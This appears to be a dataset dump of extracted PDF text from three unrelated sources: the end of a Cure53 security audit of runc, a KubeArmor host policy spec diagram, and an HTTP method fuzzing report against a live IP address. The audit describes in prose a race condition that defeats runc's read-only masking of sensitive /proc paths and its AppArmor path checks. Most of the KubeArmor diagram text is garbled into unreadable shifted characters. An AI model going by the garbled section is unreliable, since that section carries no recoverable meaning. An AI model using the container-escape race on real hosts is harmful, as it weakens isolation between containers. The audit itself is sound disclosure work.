the\ndegree of community involvement, i.e. through the use of bug bounty programs. While a\ngood level of code quality is paramount for a good security posture, the processes and\nimplementations around it can also make a difference in the final assessment of the\nsecurity posture.\nSecurity Contact\nTo ensure a secure and responsible disclosure of security vulnerabilities, it is important\nto have a dedicated point of contact. This person/team should be known, meaning that\nall necessary information such as an email address and preferably also encryption keys\nof that contact should be communicated appropriately.\n2 https://github.com/opencontainers/runc/blob/master/PRINCIPLES.md3 https://github.com/opencontainers/runc/blob/master/MAINTAINERS_GUIDE.md\nCure53, Berlin · 12/06/19 9/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nAlongside security notes4, runc offers the relevant contact’s email address\n(security@opencontainers.org ). However, the document omits important details, such as\nthe respective PGP keys and an outline of the disclosure process. Upon handling the\nreporting of the vulnerability described in RUN-01-001, Cure53 found the response times\nunsatisfactory. Specifically, an answer was only issued after additional inquiry. A\nseemingly completely unrelated email address for handling security requests\n(secalert@redhat.com ) was provided by the developers later in the process. As such, it\nis highly recommended to improve this area, first by making sure security researchers\ncan encrypt their reports by including a PGP key and, secondly, by making sure that the\nreporting and disclosure processes are transparently outlined. A revised strategy in this\nrealm will make it easier for the researchers to understand the type of information to\ninclude and which answers they can expect when.\nSecurity Fix Handling\nWhen fixing vulnerabilities in a public repository, it should not be obvious that a particular\ncommit addresses a security issue. Moreover, the commit message should not give a\ndetailed explanation of the issue. This would allow an attacker to construct an exploit\nbased on the patch and the provided commit message prior to the public disclosure of\nthe vulnerability. This means that there is a window of opportunity for attackers between\npublic disclosure and wide-spread patching or updating of vulnerable systems.\nAdditionally, as part of the public disclosure process, a system should be in place to\nnotify users about fixed vulnerabilities.\nBoth SECURITY.md and CONTRIBUTING.md of runc discourage filing of vulnerabilities\ndirectly into GitHub. They rather propose sending an email to the appropriate security\ncontact. runc additionally employs a mailing list meant for distribution vendors to share\nactionable information when severe security issues occur. This is a good practice and\nmakes sure that distributions are notified early on about upcoming security fixes.\nUsually, this increases the pace of supplying updated packages. Fixed vulnerabilities are\neasily identified in their respective GitHub commits. While not being tagged accordingly,\nthey typically mention the related CVE number, so that a clear connection between the\nfix and vulnerability can unfortunately be made easily.\nBug Bounty\nHaving a bug bounty program acts as a great incentive in rewarding researchers and\ngetting them interested in projects. Especially for large and complex projects that require\na lot of time to get familiar with the codebase, bug bounties work on the basis of the\npotential reward for efforts.\n4 https://github.com/opencontainers/org/tree/master/security\nCure53, Berlin · 12/06/19 10/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nThe runc project does not have a bug bounty program at present, however this should\nnot be strictly viewed in a negative way. This is because bug bounty programs require\nadditional resources and management, which are not always a given for all projects.\nHowever, if resources become available, establishing a bug bounty program for runc\nshould be considered. It is believed that such a program could provide a lot of value to\nthe project.\nBug Tracking & Review Process\nA system for tracking bug reports or issues is essential for prioritizing and delegating\nwork. Additionally, having a review process ensures that no unintentional code, possibly\nmalicious code, is introduced into the codebase. This makes good tracking and review\ninto two core characteristics of a healthy codebase.\nIn runc, bugs which are not security-related should be handled via GitHub and users are\nable to directly submit pull requests. The developers seem to have a firm grip on the\nprocess of submitting, triaging and reviewing such changes.\nEvaluating the Overall Posture\nIn general, the security posture of runc makes a good impression, as it can be derived\nfrom the judgments made about the individual items above. The short code audit and the\nhistory of previous vulnerabilities clearly show that there is not too much reason for\nconcern. The handling of a security issues should probably be improved and could\nbenefit from the incentives for reporting security issues. Nevertheless, the project has a\ngood stance when it comes to its overall security posture.\nChoosing Go has been a great decision and automatically reduces the potential for\nintroducing memory safety-related issues. Additionally, the rather complete\ndocumentation along with the established processes for patch reviews further reduce the\nrisk of security vulnerabilities. A topic worth-mentioning is that of a bug bounty program:\nsince these require good funding, it is understandable that smaller projects are likely\nunable to secure these. However, with future growth of the project and potentially\nincreased resources, bug bounty scheme should definitely be considered.\nCure53, Berlin · 12/06/19 11/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPhase 2: Manual code auditing & pentesting\nThis section comments on the code auditing coverage within areas of special interest\nand documents the steps undertaken during the second phase of the audit against the\nrunc software complex. Cure53 describes the key aspects of the manual code audit\ntogether with manual pentesting and, since only one major issue was spotted, attests to\nthe thoroughness of the audit and confirms the high quality of the runc project.\n•runc was partially manually pentested on the server generously provided by the\ndevelopment team and partially examined on local systems.\n•A variety of container setups have been created to gain a deeper understanding\nof the outer and inner workings of runc.\n•The code responsible for dealing with mount-points was explicitly audited for\ncommon exploitation possibilities.\n•Derailing runc by using symlinks was attempted in the context of the /dev\nfilesystem but this could not be achieved.\n•Abusing core dumping to the host via symlinks along with spawning zombie\nprocess while killing their parent processes has led nowhere.\n•It was audited to what extent interfering with the /proc filesystem could lead to\nAppArmor not being applied correctly.\n•It was checked if any privileged processes were reaching into containers with the\nintent of escaping the respective container by default.\n•Several typical runc invocations were traced to see which operations and\nespecially system calls are being used to create a container.\n•It was attempted to locate TOCTOU errors in handling files/path; the\nEnsureProcHandle() is used properly.\n•It was investigated what the impact of shared namespaces would be, but failing\nto join mount/pid namespaces5 stopped these efforts.\n•The access controls handled by runc were audited to figure out what the\nexpectations on the host system are.\n•The integration of CRIU with respect to abusing its invocation via runc-\ncheckpoint and runc-restore was investigated.\n•The codebase was audited for all aspects of terminal attachment functionality, in\nparticular process invocation and the recvtty/console code were examined.\n•The runc code was audited for problems in check-pointing and handling of root\nfilesystems.\n•The code handling of Intel RDT was given extra care, especially as regards file-\nhandling and filesystem/scheme writing.\n•The file path normalization code down the Go core library was audited. It was\nseen as pretty straightforward and purely lexical, with no potential for affecting\nsymlinks.\n•The securejoin code was analyzed and pentested with respect to symlinks in file\npaths, including some core library functionality.\n5 https://github.com/opencontainers/runc/issues/1700\nCure53, Berlin · 12/06/19 12/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nMounting/Binding and Symlinks\nThe code responsible for mounting volumes and binding filesystems was inspected,\nparticularly in connection with symlinks and filename/path traversal/normalization.\nCure53 was making sure it was impossible to escape out of a container via the\nfilesystem. This was given extra care, since it had been pointed out as a focus area by\nthe runc development team. In essence, one maintainer requested looking for ‘ways to\nescape containers via symlinks and mounts from within the root filesystem’ and ‘binding\n/mnt to /mnt inside the container, /mnt being a traversing link akin to ../../’.\nWhile no obvious vulnerabilities in the core library could be identified, the discussion of\nthese efforts nevertheless indirectly led to the discovery of RUN-01-001 by the\nindependent party, namely Leopold Schabel ( leoluk).\nIt has to be noted that the applied path-based approach used within the runc codebase\nis generally not race-safe, even as far as the application of the filepath-securejoin\npackage is concerned. These path aspects, quite prone to race-conditions, should\neventually be reworked to handle paths via filedescriptors and cease using textual file\npaths, as evidenced by the related issue6.\nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in chronological order rather than by their\ndegree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each vulnerability is\nadditionally given a unique identifier (e.g. RUN-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nRUN-01-001 Race-condition bypassing masked paths (High)\nThrough relationships to various security researchers, an interesting opportunity for a\nsecurity review emerged. Leopold Schabel (aka leoluk), who had previously reported an\nissue as a publicly disclosed runc7 vulnerability, discovered a race-condition involving\ntwo containers that can be used to bypass the read-only remounting of the potentially\ndangerous /proc filesystem paths.\nThe issue was reported by the discoverer at midnight UTC on the 26th/27th of\nNovember 2019 and has been included in the documented security mailing list of\nsecurity@opencontainers.org . The steps to reproduce the issue with podman can be\n6 https://github.com/containers/crun/issues/1117 https://github.com/opencontainers/runc/issues/2128\nCure53, Berlin · 12/06/19 13/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nfound on the respective gist. Additional reproduction steps for runc are available by\nfollowing the link.\nThe attack requires a rootfs in container-2 where /proc is symlinked to a folder like\n/evil/layer/proc. This target folder has to be inside of a volume shared by container-1 and\ncontainer-2. When container-2 is started, runc will first mount procfs by following the\nsymlink into the shared volume to /evil/layer/proc. Then container-1 has to win a race\ncondition, whereas container-1 switches the mount-point from /evil/layer/proc to\n/evil/layer~/proc. This means the procfs in container-2 is now in /evil/layer~/proc, and not\nin /evil/layer/proc. However, runc trusts the path and continues with the setup. Eventually\nrunc will remount dangerous procfs paths as read-only, yet does so by following the\nsymlink into the normal folder at /evil/layer/proc. This means that the dangerous procfs\npaths were not remounted as read-only. After container-1 switches the mount point\nback, container-2 gains a writable access to the dangerous procfs paths.\nDuring this investigation, the discoverer also realized that the fix for issue #2128,\nspecifically the function EnsureProcHandle() , could also be bypassed with this attack.\nSymlinks can be used to point critical files like /proc/self/attr/%s to other procfs files, thus\npassing the checks. However, runc will write AppArmor settings to the wrong file.\nIt should be noted that these issues are very difficult to fix because file paths are\ninherently prone to race conditions. For general file handling, it is advised to work with\nfiledescriptors rather than paths, but there is no equivalent mount syscall that takes\nfiledescriptors. Documenting these risks and attack surface can help projects building on\ntop of runc while mitigating such issues. This can be done, for example, by using much\nmore restrictive configurations.\nCure53, Berlin · 12/06/19 14/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nConclusions & Verdict\nThis assessment of the runc complex generally concludes on a positive note. Cure53,\nrepresented in this assessment by a team of seven testers, can conclude that the project\nheld well to scrutiny and exhibits numerous indicators of taking security seriously. After\nbeing commissioned to perform this assessment by CNCF and having spent eighteen\ndays on the scope, Cure53 arrived at positive verdict for both phases of the project.\nConsequently, it can be stated that the runc complex passed general security posture\nchecks (Phase 1) and exposed no major mistakes in its coding practices ( Phase 2).\nTo give some context, this is one in a series of high-level assessments created by\nCure53 for a CNCF-selected project, which contraposes classic code audits and\npentests. From the meta-level of code quality and project structure to the employed\ncoding patterns and coherent style, the runc project is quite impressive. Offering a\nverdict, Cure53 must underline that the runc processes and documentation are of high\nquality, even though some room for improvement has been identified. The state of the\nsoftware system is sound and mature.\nAmong the main positive conclusions, Cure53 wishes to point out that the static code\nanalysis did not reveal any problems of significance, meaning that automated testing will\nmost likely not yield results with the current state of technology. The choice of\nimplementation language and external components further attests to the solid stance of\nthe system. The general design principles and development guidelines are highly\nsensible and unusual in that sense.\nIn terms of items that are currently evaluated as possibly calling for further attention,\nCure53 needs to note the lack of proper regression testing and the seemingly\nunstructured application of unit-tests within the codebase. Those should be reconsidered\ntogether with the redesign of documentation, which was found somewhat difficult to\nmaneuver, in particular as regards the configuration notes being scattered.\nThe sole security issue discovered by a third-party during this engagement was used to\ntest the security incident handling processes. This generally appeared to be subpar,\nsince the reaction times were slow and the actual handling was referred to a contact\nperson who is not documented in the project’s security guidelines. In this context, even if\nthe resources for the project are clearly limited, the creation of a bug bounty program\nwould be greatly beneficial to incentivize security researcher community. The race\ncondition described in RUN-01-001 uncovered a general problem of handling file paths\ntextually. It is recommended to rethink the approach and possibly replace it with a\nfiledescriptor-based solution to make it race-safe.\nCure53, Berlin · 12/06/19 15/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nDrawing on the findings stemming from this 2019 CNCF-funded project, Cure53 can\nstate that the runc project is mature and safe, even though improving some aspects\nwould lead to a greater praise. Notably, runc is being used widely in the container- and\norchestration-realm, and this seems to be for very good reasons. The project can only\nbe recommended for continued large-scale deployment. Ongoing development\naccording to the minimal design principles and maintainer guidelines should keep the\nsystem solid in a long-term\nCure53 would like to thank Michael Crosby and Philip Estes from the runc team as well\nas Chris Aniszczyk of The Linux Foundation, for their excellent project coordination,\nsupport and assistance, both before and during this assignment. Special gratitude also\nneeds to be extended to The Linux Foundation for sponsoring this project.\nCure53, Berlin · 12/06/19 16/16" } ]
{ "category": "Provisioning", "file_name": "kubearmorhostpolicy-spec-diagram.pdf", "project_name": "KubeArmor", "subcategory": "Security & Compliance" }
[ { "data": "NFUBEBUBname: [policy name]namespace: [namespace name]TQFDTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuOPEF4FMFDUPSNBUDI-BCFMTLFZ\u001eWBMVFQSPDFTT\nNBUDI1BUITQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>\nNBUDI%JSFDUPSJFTPXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>EJS\u001b\u0001<BCTPMVUF\u0001EJSFDUPSZ\u0001QBUI>SFDVSTJWF\u001b\u0001<USVF]GBMTF>\nNBUDI1BUUFSOTQBUUFSO\u001b\u0001<SFHFY\u0001QBUUFSO>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GJMF\nNBUDI1BUITQBUI\u001b\u0001<BCTPMVUF\u0001GJMF\u0001QBUI>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>\nNBUDI%JSFDUPSJFT\nPXOFS0OMZ\u001b\u0001<USVF]GBMTF>GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>EJS\u001b\u0001<BCTPMVUF\u0001EJSFDUPSZ\u0001QBUI>SFDVSTJWF\u001b\u0001<USVF]GBMTF>\nNBUDI1BUUFSOTQBUUFSO\u001b\u0001<SFHFY\u0001QBUUFSO>PXOFS0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>SFBE0OMZ\u001b\u0001<USVF]GBMTF>\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuOFUXPSL\nNBUDI1SPUPDPMTQSPUPDPM\u001b\u0001\\\u0001UDQ\u0001]\u0001VEQ\u0001]\u0001JDNQ\u0001^GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>DBQBCJMJUJFT\nNBUDI$BQBCJMJUJFTDBQBCJMJUZ\u001b\u0001\\\u0001OFU@SBX\u0001^GSPN4PVSDFQBUI\u001b\u0001<BCTPMVUF\u0001FYFDVUBCMF\u0001QBUI>TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^TFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFuTFWFSJUZ\u001b\u0001<\u0012\u000e\u0012\u0011>UBHT\u001b\u0001<tUBH\u0012u\r\u0001tUBH\u0013u\r\u0001j>NFTTBHF\u001b\u0001tNFTTBHF\u0001IFSFu\nList\nList\nListList\nList\nListListListOptional\nOptional\nOptional\nOptionalOptionalOptionalOptionalOptionalOptionalOptional\nOptionalOptionalMandatoryMandatory\nMandatory if these are not defined in each ruleKubeArmorHostPolicy Spec Diagram\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^\nBDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^BDUJPO\u001b\u0001\\\"VEJU\u0001]\u0001#MPDL^Key Difference between KubeArmorPolicy and KubeArmorHostPolicyKubeArmorPolicy — action: {Allow | Audit | Block}KubeArmorHostPolicy — action: {Allow | Audit | Block}In the case that ‘fromSource’ is defined, then ‘Allow’ is available.No Namespace in the case of KubeArmorHostPolicy\nnodeSelector (not selector)\nListListListList\nListList" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-14 19_13_47.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 6/Security Test Suite 1/http://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 19:13:47\nTime taken 00:00:08.369\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PURGE http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codesAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest COPY http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest UNLOCK http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest LOCK http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod LOCK\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PROPFIND http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PATCH http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest TRACE http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNINGEndpoint http://164.90.157.161/\nRequest OPTIONS http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest HEAD http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest DELETE http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest PUT http://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod PUT\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint http://164.90.157.161/\nRequest POST http://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod POST\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 302 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" } ]